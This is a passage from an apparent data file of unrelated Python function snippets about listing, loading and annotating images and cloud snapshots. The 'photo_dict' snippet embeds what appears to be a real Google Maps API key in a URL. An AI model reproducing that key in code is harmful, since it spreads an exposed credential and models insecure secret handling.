cs.list_snapshots()\n res = []\n server_id = self.cloudserver.id\n # find the one for this server\n for snapshot in snapshots:\n img = snapshot.metadata.get(\"instance_uuid\", None)\n # print img\n\n if img == server_id:\n print \"Server %s has snapshot %s\" % (server_id, img)\n res.append(img)\n\n return res", "def getSnapshotsOf(image):\n snapshotIds = []\n deviceMapping = image.block_device_mapping # dict of devices\n devices = deviceMapping.keys()\n for d in devices:\n snapshotId = deviceMapping[d].snapshot_id\n if snapshotId is not None:\n snapshotIds.append(snapshotId.encode())\n return snapshotIds", "def images_list(self, kwargs=None):\n\n try:\n scode, images = Rest.get('Image')\n except docker.errors.APIError as e:\n Console.error(e.explanation)\n return\n\n if len(images) == 0:\n Console.info(\"No images exist\")\n return\n\n n = 1\n e = {}\n for image in images:\n d = {}\n d['Ip'] = image['Ip']\n d['Id'] = image['Id']\n if image['RepoTags'] == None:\n d['Repository'] = image['RepoDigests'][0]\n else:\n d['Repository'] = image['RepoTags'][0]\n # d['Size'] = image['Size']\n d['Size(GB)'] = round(image['Size'] / float(1 << 30), 2) # Converting the size to GB\n e[n] = d\n n = n + 1\n Console.ok(str(Printer.dict_table(e, order=['Ip', 'Id', 'Repository', 'Size(GB)'])))", "def items(self):\n if self.__has_contents:\n return [dict(zip(['id', 'description', 'size', 'start_time', 'state'],\n [item['SnapshotId'], item['Description'], item['VolumeSize'],\n item['StartTime'], item['State']]))\n for item in self.__response['Snapshots']]\n else:\n return []", "def get_image_information(client):\n\n pipeline = [{\"$match\": {\"camera_views\": {\"$exists\": 1}}}, {\"$unwind\": {\"path\": \"$camera_views\"}}, {\"$addFields\": {\n \"camera_views.average_linear_distance\": {\n \"$divide\": [\n \"$camera_views.total_linear_distance\",\n \"$camera_views.num_entities\"\n ]\n },\n \"camera_views.average_angular_distance\": {\n \"$divide\": [\n \"$camera_views.total_angular_distance\",\n \"$camera_views.num_entities\"\n ]\n },\n \"camera_views.timestamp\": \"$timestamp\",\n \"camera_views._id\": \"$_id\",\n \"camera_views.database\": client.database.name,\n \"camera_views.collection\": client.name,\n 'camera_views.file_id':\"$camera_views.images.file_id\", #Add the Color image id for downloading and testing\n }}, {\"$replaceRoot\": {\"newRoot\": \"$camera_views\"}}, {\"$project\": {\n \"_id\": 1,\n \"num_entities\": 1,\n \"average_linear_distance\": 1,\n \"average_angular_distance\": 1,\n \"timestamp\": 1,\n \"duplicate\": 1,\n \"database\":1,\n \"collection\":1,\n \"file_id\":{\"$arrayElemAt\":[\"$images.file_id\",0]}, # Only keep the first file id (The Color image)\n }}]\n pprint.pprint(pipeline)\n result = list(client.aggregate(pipeline))\n return result", "def get_image_collection(images_directory, variant, dimensions):\n \n stains = variant.get(\"values\", [])\n primary_stain = variant.get(\"primary_value\", None) \n\n image_data = []\n\n images_directory_glob = images_directory\n if images_directory_glob[-1] != os.sep:\n images_directory_glob = images_directory_glob + os.sep\n images_directory_glob = images_directory_glob + \"*\"\n\n for image_file in glob.glob(images_directory_glob):\n file_name = os.path.basename(image_file)\n\n image_stain = None\n image_root = file_name\n for stain in stains:\n image_root = image_root.replace(stain, \"\")\n if stain in file_name:\n image_stain = stain\n\n image_dimensions = {}\n\n for key, value in dimensions.iteritems():\n if value[\"type\"] == \"String Match\":\n image_dimensions[key] = \\\n get_dimension_string_match(file_name, value.get(\"data\", []))\n elif value[\"type\"] == \"Date Parse\":\n image_dimensions[key] = get_dimension_date_parse(file_name)\n\n experiment_name = experiment.get_experiment_name(file_name)\n experiment_date = experiment.get_experiment_date(file_name)\n\n seed_source_image = file_name\n if primary_stain not in seed_source_image and primary_stain is not None:\n for stain in stains:\n seed_source_image = seed_source_image.replace(stain, primary_stain)\n \n image_data.append({\n \"file_name\": file_name,\n \"file_root\": image_root,\n \"stain\": image_stain, # TODO: Deprecate\n \"experiment_name\": experiment_name, # TODO: Deprecate\n \"experiment_date\": experiment_date, # TODO: Deprecate\n \"seed_source_image\": seed_source_image,\n \"variant\": image_stain,\n \"dimensions\": image_dimensions\n })\n\n return image_data", "def list_images():\n return json_response(list_manifests())", "def get_image_set_for_uid(uid: str):\n images = get_all_image_structs(uid, Config.study_size, is_accumulating=False)\n res = {'images': images}\n return res", "def detail(self, req):\n params = {\n 'filters': self._get_filters(req),\n 'limit': self._get_limit(req),\n }\n\n if 'marker' in req.str_params:\n params['marker'] = self._get_marker(req)\n\n images = db_api.image_get_all_public(None, **params)\n\n image_dicts = [make_image_dict(i) for i in images]\n return dict(images=image_dicts)", "def get_image_list(im, dic):\n lst = list(im.getdata())\n tiles = []\n for i in range(len(lst)):\n #print find_similar(lst[i], dic)[random.randrange(10)][1]\n tiles.append(find_similar(lst[i], dic)[random.randrange(10)][1])\n return tiles", "def get_objects(self, image_np: np.array,\n image: Image) -> Tuple[Dict, object]:\n pass", "def get_additional_images_downsample(widget) -> Dict[str, str]:\n images = {}\n for layer in widget.viewer.value.layers.selection:\n if layer._source.path is not None:\n images[layer._name] = str(layer._source.path)\n return images", "def getImg(img_name):\n img = Image.objects.raw({\"_id\": img_name}).first()\n in_dict = {}\n in_dict[\"name\"] = img.name\n in_dict[\"b64str\"] = img.b64str\n in_dict[\"imgsize\"] = img.imgsize\n in_dict[\"processed\"] = img.processed\n in_dict[\"timestamp\"] = img.timestamp\n return in_dict", "def getAllForImages(self):\n imageDict = {}\n for id, name in self.getAll().items():\n imageDict[id] = {}\n imageDict[id][\"name\"] = name\n imageDict[id][\"filename\"] = \"The_Steamer_Great_Western_small.jpg\"\n\n return imageDict", "def loadImagesAvatar(self): \n dictionary = {}\n dictionary[\"body\"] = None\n dictionary[\"shoes\"] = None\n dictionary[\"shirt\"] = None\n dictionary[\"trousers\"] = None\n dictionary[\"skirt\"] = None\n dictionary[\"head\"] = None\n dictionary[\"hair\"] = None\n dictionary[\"mask\"] = None\n return dictionary", "def test_get_imagelist_inmutable(self):\n images1 = self.mock_master.get_imagelist(self.region1)\n images2 = self.mock_master.get_imagelist(self.region1)\n r2dict = dict((i.id, i) for i in images2)\n self.assertEquals(images1, images2)\n self.assertNotEquals(id(images1), id(images2))\n for image in images1:\n self.assertIn(image.id, r2dict)\n image2 = r2dict[image.id]\n self.assertEquals(image, image2)\n self.assertNotEquals(id(image), id(image2))\n self.assertNotEquals(id(image.user_properties),\n id(image2.user_properties))", "def get_images(self):\r\n if self.images is None:\r\n self.images = {}\r\n for name, img_num in self.images.iteritems():\r\n if isinstance(img_num, int):\r\n yield (name, img_num)", "def getPictures (self, list) :\n\n result = []\n for event in list :\n eventEntry = {}\n eventEntry ['id'] = link = event.answer.id\n eventEntry ['time'] = event.timeOf\n eventEntry ['comments'] = event.answer.comments\n eventEntry ['location'] = self.where (event.answer)\n eventEntry ['problem'] = event.answer.survey ['problem_type']\n eventEntry ['pictures'] = self.pic (Picture.objects.filter (answer__id = link))\n result.append (eventEntry)\n \n return result", "def get_imgid_dict(ann):\n return {item[1][\"file_name\"]: item[0] for item in ann.imgs.items()}", "def detail(self, req):\n context = req.environ['nova.context']\n filters = self._get_filters(req)\n images = self._image_service.detail(context, filters=filters)\n images = common.limited(images, req)\n builder = self.get_builder(req).build\n return dict(images=[builder(image, detail=True) for image in images])", "def list_images(bin_lid):\n bin_url = DATA_NAMESPACE + bin_lid + '.json'\n logging.info('listing images for %s' % bin_lid)\n ds = json.loads(urllib.urlopen(bin_url).read())\n for d in ds:\n yield d['imagename']", "def detect_objects(snap):\n client = vision.ImageAnnotatorClient()\n print(snap)\n\n with open(snap, 'rb') as im_file:\n content = im_file.read()\n image = vision.Image(content=content)\n\n objects = client.object_localization(image=image).localized_object_annotations\n\n print(f\"Found {len(objects)} objects\")\n [print(f\"{objet.name} : {round(objet.score*100,2)}\") for objet in objects]\n \n return objects", "def __getitem__(self, query: BoundingBox) -> Dict[str, Any]:\n data = self._get_tensor(query)\n key = \"image\"\n sample = {key: data, \"crs\": self.crs, \"bbox\": query}\n\n return sample", "def list_images(self):\n raise NotImplementedError()", "def avail_locations(call=None):\n if call == \"action\":\n raise SaltCloudSystemExit(\n \"The avail_images function must be called with \"\n \"-f or --function, or with the --list-locations option\"\n )\n\n ret = {}\n conn = get_conn()\n\n for item in conn.list_locations()[\"items\"]:\n reg, loc = item[\"id\"].split(\"/\")\n location = {\"id\": item[\"id\"]}\n\n if reg not in ret:\n ret[reg] = {}\n\n ret[reg][loc] = location\n return ret", "def populate_snapshots(self):\n print \"Populating snapshots info...\"\n snapshots = self.get_all_snapshots()\n\n for i in snapshots:\n\n # find the ami id(s) for this snapshot. API allows for multiple even though I don't think there would be\n associated_ami_ids = self.get_amis_of(i.id)\n\n ami_keep_tags = [Ims.spreadsheet[ami_id]['KEEP_tag'] for ami_id in associated_ami_ids]\n\n self.spreadsheet[i.id] = dict(Name_tag=self.get_name_tag(i), id=i.id, KEEP_tag=self.get_keep_tag(i),\n ami_KEEP_tag=ami_keep_tags, associated_ami_ids=associated_ami_ids,\n PROD_tag=self.is_production(i), start_time=i.start_time,\n region=i.region.name, associated_volume=i.volume_id,\n volume_size=i.volume_size, description=i.description)", "def test_list_image_metadata(self):\n pass", "def get_images(self, page_number):", "def checksImages(self):\n metadata=[]\n for image in self.meta['sources']:\n with rasterio.open(image) as src:\n metaData=src.meta\n \n assert metaData['driver'] == 'GTiff', \"Driver is not supported: {0}\".format(metaData['driver'])\n assert metaData['count'] == len(self.meta['bandNames']), \"Nbands incorrect, expected: {0}, {1} provided\".format(metaData['count'],len(self.meta['bandNames']))\n \n metadata.append({'dtype': metaData['dtype'], 'driver': metaData['driver'], 'nodata': metaData['nodata'], 'nBands': metaData['count'],'crs': src.crs.to_string()})\n \n assert len(set([item['dtype'] for item in metadata])) == 1, \"Images list dtypes aren't compatibles. Expected: 1, {1} provided\".format(metaData['count'],len(set([item['dtype'] for item in metadata])))\n assert len(set([item['driver'] for item in metadata])) == 1, \"Images list drivers aren't compatibles. Expected: 1, 1 provided\".format(metaData['count'],len(set([item['driver'] for item in metadata])))\n assert len(set([item['nodata'] for item in metadata])) == 1, \"Images list nodata values aren't compatibles. Expected: 1, {1} provided\".format(metaData['count'],len(set([item['nodata'] for item in metadata])))\n assert len(set([item['nBands'] for item in metadata])) == 1, \"Images list nBands number aren't compatibles. Expected: 1, {1} provided\".format(metaData['count'],len(set([item['nBands'] for item in metadata])))\n assert len(set([item['crs'] for item in metadata])) == 1, \"Images list crs aren't compatibles. Expected: 1, {1} provided\".format(metaData['count'],len(set([item['crs'] for item in metadata]))) \n return metadata[0]", "def metadata2eic(url):\n logging.info('fetching image metadata from %s' % url)\n ds = json.loads(urllib.urlopen(url).read())\n fields = ['imagename','alt','pitch','roll']\n for d in ds:\n yield map(str,[d[k] for k in fields])", "def image(images):\n return images[0]", "def make_image(self, **kwargs):\n image = dict(self.BASE_EMR_IMAGE, **kwargs)\n\n return {k: v for k, v in image.items() if v is not None}", "def get_imgs_from_json(self):\n # instantiate COCO specifying the annotations json path\n # Specify a list of category names of interest\n catIds = self.coco.getCatIds(catNms=[self.categ])\n print(\"catIds: \", catIds)\n # Get the corresponding image ids and images using loadImgs\n imgIds = self.coco.getImgIds(catIds=catIds)\n images = self.coco.loadImgs(imgIds)\n print(f\"{len(images)} images in '{self.json_path}' with '{self.categ}' instances\")\n self.catIds = catIds # list\n return images", "def detail(self, req):\n context = req.environ['nova.context']\n filters = self._get_filters(req)\n page_params = common.get_pagination_params(req)\n images = self._image_service.detail(context, filters=filters,\n **page_params)\n builder = self.get_builder(req).build\n return dict(images=[builder(image, detail=True) for image in images])", "def get_metadata():\n\n metadata = []\n current_date = (datetime.date.today(),)\n\n # make sql connection\n # execute query\n with sql_cursor() as cursor:\n try:\n cursor.execute('USE goggles')\n cursor.execute('SELECT b.image_name, b.X_Min, b.Y_Min, b.X_Max, b.Y_Max, '\n 'b.init_vector, b.goggles from BBOX AS b, IMAGE as i where '\n 'b.image_name=i.image_name and i.image_date=%s and b.goggles=False', current_date)\n\n for (image_name, x_min, y_min, x_max, y_max, init_vector, goggles) in cursor:\n metadata.append({'image_name': image_name,\n 'x_min': float(x_min),\n 'y_min': float(y_min),\n 'x_max': float(x_max),\n 'y_max': float(y_max),\n 'init_vector': init_vector\n })\n except Exception as e:\n print(e)\n\n with open(METADATA_FILE, 'w') as meta_file:\n json.dump(metadata, meta_file)\n return metadata", "def get_raw(self):\n \n return [i.get_metadata() for i in self.img_lst]", "def get_images(self):\n \n return self.img_lst", "def getSnapshots(self):\n snapshots = []\n for x in self.root.goto('CommonDataObjects/Attachments'):\n for y in x.getList():\n if y['name'] == 'Video Snapshot':\n self.f.seek(y['bidx'])\n blk = Block(self.f)\n sx = blk.goto('res_x').getLong()\n sy = blk.goto('res_y').getLong()\n raw = blk.goto(\"imagedata\").value\n data = zlib.decompress(raw)\n I = np.flipud(np.array(struct.unpack(\"<\" + str(3 * sx * sy) + \"B\", data)).reshape((sy, sx, 3)))\n snapshots.append(I)\n del blk\n return snapshots", "def __getitem__(self, idx):\n img_item = self.data['images'][idx]\n img_item_id = img_item['id']\n img_item_name = img_item['file_name']\n img_anno_list = [i for i in list(self.data['annotations'])\n if i['image_id'] == img_item_id]\n img_path = os.path.join(self.root, img_item_name)\n box = np.floor(np.array([i['bbox'] for i in img_anno_list]))\n category = np.array([i['category_id'] for i in img_anno_list])\n\n img = Image.open(img_path)\n results = self.transforms(img, box, category)\n img, box, category = results['img'], results['box'], results['category']\n\n return {\n 'img': img,\n 'box': box,\n 'category': category\n }", "def pic (self, list) : \n result = []\n for pmod in list :\n result.append (pmod.photo_uri)\n return result", "def get_entry_dict(self):\n\n # generating thumbnail URLs is slow, so only generate the ones\n # that will definitely be used.\n ret = {\n 'id': self.id,\n 'vertices': self.vertices,\n 'triangles': self.triangles,\n 'segments': self.segments,\n 'photo': self.photo.get_entry_dict(),\n }\n if self.dominant_rgb0:\n ret['dominant_rgb0'] = self.dominant_rgb0\n #if self.image_pbox:\n #ret['pbox'] = self.pbox\n #ret['image_pbox'] = {\n #'300': self.image_pbox_300.url,\n #'512': self.image_pbox_512.url,\n #'1024': self.image_pbox_1024.url,\n #'orig': self.image_pbox.url,\n #}\n if self.image_bbox:\n ret['image_bbox'] = {\n #'512': self.image_bbox_512.url,\n '1024': self.image_bbox_1024.url,\n #'orig': self.image_bbox.url,\n }\n return ret", "def get_images(self):\n return {'source': utils.image_from_tensor(self.source[0]),\n 'output': utils.image_from_tensor(self.output.data[0]),\n 'target': utils.image_from_tensor(self.target[0])}", "def create_observations_dict(instances, unprocessed_map_data):\n # print(instances)\n results = {}\n for idx in instances:\n results[idx] = {}\n if idx == instances[0]:\n tag_filter_pixel_corners = B.compute_corner_pixels(\n idx, unprocessed_map_data\n ).tolist()\n # prettified_corner_pixels = [tag_filter_pixel_corners[:2,0],tag_filter_pixel_corners[:2,1],tag_filter_pixel_corners[:2,2],tag_filter_pixel_corners[:2,3]]\n # results[idx][\"corner_pixels\"] = [pixel_pair.tolist() for pixel_pair in prettified_corner_pixels]\n results[idx][\"corner_pixels\"] = tag_filter_pixel_corners\n results[idx][\"tag_pose\"] = B.compute_tag_pose(\n idx, unprocessed_map_data\n ).tolist()\n results[idx][\"camera_pose\"] = B.compute_camera_pose(\n idx, unprocessed_map_data\n ).tolist()\n\n return results", "def get_iss_photos(lista,size=\"small\"):\n photos = []\n lista=asciitable.read(lista)\n lista=lista.ID\n pattern_s_L=[]\n pattern_b_L=[]\n link_L=[]\n idiss=[] \n for i in lista:\n pattern_s = \"http://eol.jsc.nasa.gov/DatabaseImages/ESC/%s/%s/%s-E-%s.JPG\" % (\n size,\n i[0:6],\n i[0:6],\n i[9:])\n pattern_b = \"http://eol.jsc.nasa.gov/DatabaseImages/ESC/%s/%s/%s-E-%s.JPG\" % (\n 'large',\n i[0:6],\n i[0:6],\n i[9:])\n link = \"http://eol.jsc.nasa.gov/SearchPhotos/photo.pl?mission=%s&roll=E&frame=%s\" % (\n i[0:6],\n i[9:])\n idISS = \"%s-E-%s\" % (\n i[0:6],\n i[9:])\n pattern_s_L.append(pattern_s)\n pattern_b_L.append(pattern_b)\n link_L.append(link)\n idiss.append(idISS)\n\n tmp = dict(link_small=pattern_s,\n link_big=pattern_b,\n link=link,\n idISS=idISS\n )\n\n photos.append(tmp)\n return photos,pattern_s_L,pattern_b_L,link_L,idiss", "def get_mapping_actions(image=None, imageId=None, in_digests=[], bundle={}):\n\n if not image or not bundle:\n raise Exception(\"input error\")\n\n if not verify_policy_bundle(bundle=bundle):\n raise Exception(\"input bundle does not conform to bundle schema\")\n\n ret = []\n \n image_infos = []\n\n image_info = anchore_utils.get_all_image_info(image)\n if image_info and image_info not in image_infos:\n image_infos.append(image_info)\n\n for m in bundle['mappings']:\n polname = m['policy_id']\n wlnames = m['whitelist_ids']\n\n for image_info in image_infos:\n #_logger.info(\"IMAGE INFO: \" + str(image_info))\n ii = {}\n ii.update(image_info)\n registry = ii.pop('registry', \"N/A\")\n repo = ii.pop('repo', \"N/A\")\n\n tags = []\n fulltag = ii.pop('fulltag', \"N/A\")\n if fulltag != 'N/A':\n tinfo = anchore_utils.parse_dockerimage_string(fulltag)\n if 'tag' in tinfo and tinfo['tag']:\n tag = tinfo['tag']\n\n for t in [image, fulltag]:\n tinfo = anchore_utils.parse_dockerimage_string(t)\n if 'tag' in tinfo and tinfo['tag'] and tinfo['tag'] not in tags:\n tags.append(tinfo['tag'])\n\n digest = ii.pop('digest', \"N/A\")\n digests = [digest]\n for d in image_info['digests']:\n dinfo = anchore_utils.parse_dockerimage_string(d)\n if 'digest' in dinfo and dinfo['digest']:\n digests.append(dinfo['digest'])\n \n p_ids = []\n p_names = []\n for p in bundle['policies']:\n p_ids.append(p['id'])\n p_names.append(p['name'])\n\n wl_ids = []\n wl_names = []\n for wl in bundle['whitelists']:\n wl_ids.append(wl['id'])\n wl_names.append(wl['name'])\n \n if polname not in p_ids:\n _logger.info(\"policy not in bundle: \" + str(polname))\n continue\n\n skip=False\n for wlname in wlnames:\n if wlname not in wl_ids:\n _logger.info(\"whitelist not in bundle\" + str(wlname))\n skip=True\n if skip:\n continue\n\n mname = m['name']\n mregistry = m['registry']\n mrepo = m['repository']\n if m['image']['type'] == 'tag':\n mtag = m['image']['value']\n mdigest = None\n mimageId = None\n elif m['image']['type'] == 'digest':\n mdigest = m['image']['value']\n mtag = None\n mimageId = None\n elif m['image']['type'] == 'id':\n mimageId = m['image']['value']\n mtag = None\n mdigest = None\n else:\n mtag = mdigest = mimageId = None\n\n if registry == mregistry or mregistry == '*':\n _logger.debug(\"checking mapping for image (\"+str(image_info)+\") match.\")\n\n if repo == mrepo or mrepo == '*':\n doit = False\n matchstring = mname + \": N/A\"\n if tag and (mtag == '*' or mtag == tag or mtag in tags):\n matchstring = mname + \":\" + ','.join([mregistry, mrepo, mtag])\n doit = True\n elif digest and (mdigest == digest or mdigest in in_digests or mdigest in digests):\n matchstring = mname + \":\" + ','.join([mregistry, mrepo, mdigest])\n doit = True\n elif imageId and (mimageId == imageId):\n matchstring = mname + \":\" + ','.join([mregistry, mrepo, mimageId])\n doit = True\n\n matchstring = matchstring.encode('utf8')\n if doit:\n _logger.debug(\"match found for image (\"+str(matchstring)+\")\")\n\n wldata = []\n wldataset = set()\n for wlname in wlnames:\n wldataset = set(list(wldataset) + extract_whitelist_data(bundle, wlname))\n wldata = list(wldataset)\n\n poldata = extract_policy_data(bundle, polname)\n \n wlnames.sort()\n evalstr = ','.join([polname] + wlnames)\n evalhash = hashlib.md5(evalstr).hexdigest()\n ret.append( ( poldata, wldata, polname,wlnames, matchstring, m, evalhash) )\n return(ret)\n else:\n _logger.debug(\"no match found for image (\"+str(image_info)+\") match.\")\n else:\n _logger.debug(\"no match found for image (\"+str(image_info)+\") match.\")\n\n return(ret)", "def images(self):\n return self._data[\"images\"]", "def photo_dict(phrase):\n switcher = {\n '병원 위치': 'https://maps.googleapis.com/maps/api/staticmap?center=37.507144,127.063737&zoom=16&size=640x480&markers=color:blue%7Clabel:S%7C37.507144,127.063737&key=AIzaSyCF-XXYf7IW1mkUZFeZF84BCcZdtC-z1M0',\n '병원 운영시간': 'http://gunn.pausd.org/sites/default/files/16-17-Bell-Schedule-Color---Compatible-Font.png',\n '프로모션 A': 'http://media.dontpayfull.com/media/deals/eurostar-promo-code.jpg',\n '프로모션 B': 'http://media.dontpayfull.com/media/deals/namebubbles-com-coupon-code.jpg',\n '프로모션 C': 'https://s-media-cache-ak0.pinimg.com/originals/79/79/31/79793174d230a27e9168bbccb33df62f.jpg',\n '의료진': 'https://s-media-cache-ak0.pinimg.com/736x/f4/89/ef/f489ef22363cf1e4c2a4fb5b1cd8aec5.jpg',\n '병원 사진': 'https://www.hpcimedia.com/images/website/ManChemNews/DIR_30/F_28071.jpg',\n '병원 진료과목': 'https://s-media-cache-ak0.pinimg.com/originals/d5/05/09/d505091a57d42d3ed1de8b6f9d906fdb.jpg'\n }\n default_url = 'http://autopartstoys.com/images/M127205243.jpg'\n return switcher.get(phrase, default_url)", "def get_images():\n return _IMAGES", "def __getitem__(self, index):\n\n #get the image name \n image_names = self.image_names[index]\n\n #make single name a list\n if(type(image_names) is not list):\n image_names = [image_names]\n\n image_target_list = []\n for image_name in image_names:\n\n #build the path to the image and annotation file\n #see format tab on Get Data page on AVD dataset website\n if image_name[0] == '0':\n scene_type = 'Home'\n else:\n scene_type = 'Office'\n scene_name = scene_type + \"_\" + image_name[1:4] + \"_\" + image_name[4]\n \n #read the image and bounding boxes for this image\n #(doesn't get the movement pointers) \n img = (Image.open(os.path.join(self.root,scene_name, \n images_dir,image_name)))\n with open(os.path.join(self.root,scene_name,annotation_filename)) as f:\n annotations = json.load(f)\n target = annotations[image_name]['bounding_boxes'] \n \n #apply target transform\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n #crop images for classification if flag is set\n if self.classification:\n img = np.asarray(img)\n images = []\n ids = []\n for box in target:\n cur_img = Image.fromarray(img[box[1]:box[3],\n box[0]:box[2],\n :])\n if self.transform is not None:\n cur_img = self.transform(cur_img)\n images.append(cur_img)\n ids.append(box[4])\n\n img = images\n target = ids\n \n #apply image transform \n if self.transform is not None:\n img = self.transform(img)\n\n image_target_list.append([img,target])\n\n #special case for single image/label\n if(len(image_target_list) == 1):\n image_target_list = image_target_list[0]\n\n return image_target_list", "def pictures(self):\n return self.container['pictures']", "def snapshots_created(self):\n # log.debug(\"Getting snaps created for volume {0}\".format(self.volume_id))\n snaps_info = []\n for snap in self._derived_snapshots:\n snap_info = {}\n try:\n if snap.volume_id == self.volume_id:\n snap.update()\n snap_info['snap_id'] = snap.id\n snap_info['snap_progress'] = snap.progress\n snap_info['snap_status'] = snap.status\n snap_info['snap_desc'] = snap.description\n snaps_info.append(snap_info)\n except EC2ResponseError, e:\n log.warning(\"EC2ResponseError getting snapshot status: {0} \"\n \"(code {1}; status {2})\"\n .format(e.message, e.error_code, e.status))\n return snaps_info", "def article_images(id):\n try:\n query_string = '&artile_id='+str(id)\n logger.info('Calling the api' + APIURL + '/images/?format=json'+query_string)\n response = requests.get(APIURL + '/images/?format=json'+query_string)\n parser = json.loads(response.content)\n return parser\n except:\n logger.error('Calling the api error in article_images')\n raise Http404(\"Article image does not exist\")", "def get_data(self):\n return {\"imgID\": self.image_id}", "def write_images(deployment_key, image_data):\n\n for image_data_dict in image_data:\n\n print \"------------------>>> \" + image_data_dict['longitude']+\" \"+image_data_dict['latitude']\n\n #save the image\n image = Image(deployment_id=deployment_key,\n image_name=image_data_dict['image_name'],\n date_time=image_data_dict['date_time'],\n position=\"SRID=4326;POINT(\"+image_data_dict['longitude']+\" \"+image_data_dict['latitude']+\")\",\n #depth=image_data_dict['depth'],\n #depth_uncertainty=image_data_dict['depth_uncertainty'],\n )\n image.save()\n\n write_measurement(image, 'depth', 'm', image_data_dict['depth'])\n write_measurement(image, 'depth_uncertainty', 'm', image_data_dict['depth_uncertainty'])\n write_measurement(image, 'temperature', 'cel', image_data_dict['temperature'])\n write_measurement(image, 'salinity', 'psu', image_data_dict['salinity'])\n write_measurement(image, 'pitch', 'rad', image_data_dict['pitch'])\n write_measurement(image, 'roll', 'rad', image_data_dict['roll'])\n write_measurement(image, 'yaw', 'rad', image_data_dict['yaw'])\n write_measurement(image, 'altitude', 'm', image_data_dict['altitude'])\n\n #link the camera to the image\n camera_data_dict = read_camera_data(image_data_dict)\n camera = Camera(**camera_data_dict)\n camera.image = image\n camera.save()\n\n return None", "def view_images(request):\n user_root = request.session['user_root']\n search_id = request.session['search_id']\n with open(os.path.join(user_root, search_id, 'info.json')) as f:\n info = json.load(f)\n object_id_list = info['object_id_list']\n image_type_list = info['image_type_list']\n search_pattern = info['search_pattern']\n image_dir = scan_images(user_root, search_id, image_type_list,relative_path=True)\n\n # Add flag for conditional representation.\n flag_scan = False\n flag_classifier=info['flag_classifier']\n if search_pattern == \"scan\":\n flag_scan = True\n bounding_box_dict = scan_bb_images(\n user_root, search_id, folder_name=\"scans\")\n else:\n bounding_box_dict = scan_bb_images(user_root, search_id)\n\n return render(request, 'gallery.html',\n {\"object_id_list\": object_id_list,\n \"image_dir\": image_dir,\n \"bounding_box\": bounding_box_dict,\n \"flag_scan\": flag_scan,\n \"flag_classifier\":flag_classifier,\n \"image_type_list\":image_type_list})", "def acquire_images(cam, nodemap):\n #print(\"*** IMAGE ACQUISITION ***\\n\")\n try:\n result = True\n\n # Set acquisition mode to continuous\n \n\n # Begin acquiring images\n cam.BeginAcquisition()\n\n #print(\"Acquiring images...\")\n\n # Retrieve, convert, and save images\n \n\n try:\n # Retrieve next received image\n image_result = cam.GetNextImage()\n\n # Ensure image completion\n if image_result.IsIncomplete():\n print(\"Image incomplete with image status %d...\" % image_result.GetImageStatus())\n\n else:\n # Print image information; height and width recorded in pixels\n width = image_result.GetWidth()\n height = image_result.GetHeight()\n \n # Convert image to rgb 8 and append to list\n\n image_converted = image_result.Convert(PySpin.PixelFormat_BGR8, PySpin.HQ_LINEAR)\n \n \n\n # Release image\n image_result.Release()\n print(\"\")\n\n except PySpin.SpinnakerException as ex:\n print(\"Error: %s\" % ex)\n result = False\n\n # End acquisition\n cam.EndAcquisition()\n\n except PySpin.SpinnakerException as ex:\n print(\"Error: %s\" % ex)\n result = False\n\n return result, image_converted,width,height", "def _get_images(self):\n raw_outputs = self.interface.get_data(self.target_charge,\n self.charge_deviation,\n n_samples=self.n_samples)\n\n # apply roi to images\n roi_images = []\n for i in range(self.n_samples):\n roi_images += [apply_roi(raw_outputs['raw_images'][i], raw_outputs['ROI'])]\n\n # process and identify blobs in image\n min_size = 100\n outputs = {}\n for ele in self.output_keys:\n outputs[ele] = []\n\n for i in range(len(roi_images)):\n processed_image_data = image_processing.process_and_fit(roi_images[i],\n min_size)\n\n for ele in self.output_keys:\n if ele == 'image_check':\n outputs[ele] += [image_processing.check_image(processed_image_data['binary_image'],\n processed_image_data['smoothed_image'])]\n elif ele == 'processed_images':\n outputs[ele] += [processed_image_data['smoothed_image']]\n else:\n outputs[ele] += [processed_image_data[ele]]\n\n for ele in self.output_keys:\n outputs[ele] = np.array(outputs[ele])\n\n # add in raw data\n outputs.update(raw_outputs)\n\n # if we need to, get averaged results\n if self.average_measurements:\n avg_keys = ['rms_x', 'rms_y', 'CX', 'CY', 'n_blobs', 'FWHMX', 'FWHMY', 'centroid_offset']\n for key in avg_keys:\n outputs[key] = np.nanmean(outputs[key])\n\n return outputs", "def loadImagesTag(self): \n dictionary = {}\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(GENDER_FRONT)\n dictionary[\"gender\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SKIN_BACK)\n dictionary[\"skin\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(HEAD_BACK)\n dictionary[\"head\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(BODY_BACK)\n dictionary[\"body\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(MASK_BACK)\n dictionary[\"mask\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(HAIR_BACK)\n dictionary[\"hair\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n if self.avatarConfiguration[\"gender\"] == \"boy\":\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SHIRT_BACK)\n dictionary[\"shirt\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(TROUSERS_BACK)\n dictionary[\"trousers\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SKIRT_BACK)\n dictionary[\"skirt\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n else:\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SHIRT_DISABLED)\n dictionary[\"shirt\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(TROUSERS_DISABLED)\n dictionary[\"trousers\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SKIRT_BACK)\n dictionary[\"skirt\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SHOES_BACK)\n dictionary[\"shoes\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n return dictionary", "def __getitem__(self, index):\n\n #get the image name and box\n #image_name,box_index = self.name_and_box_index[index]\n 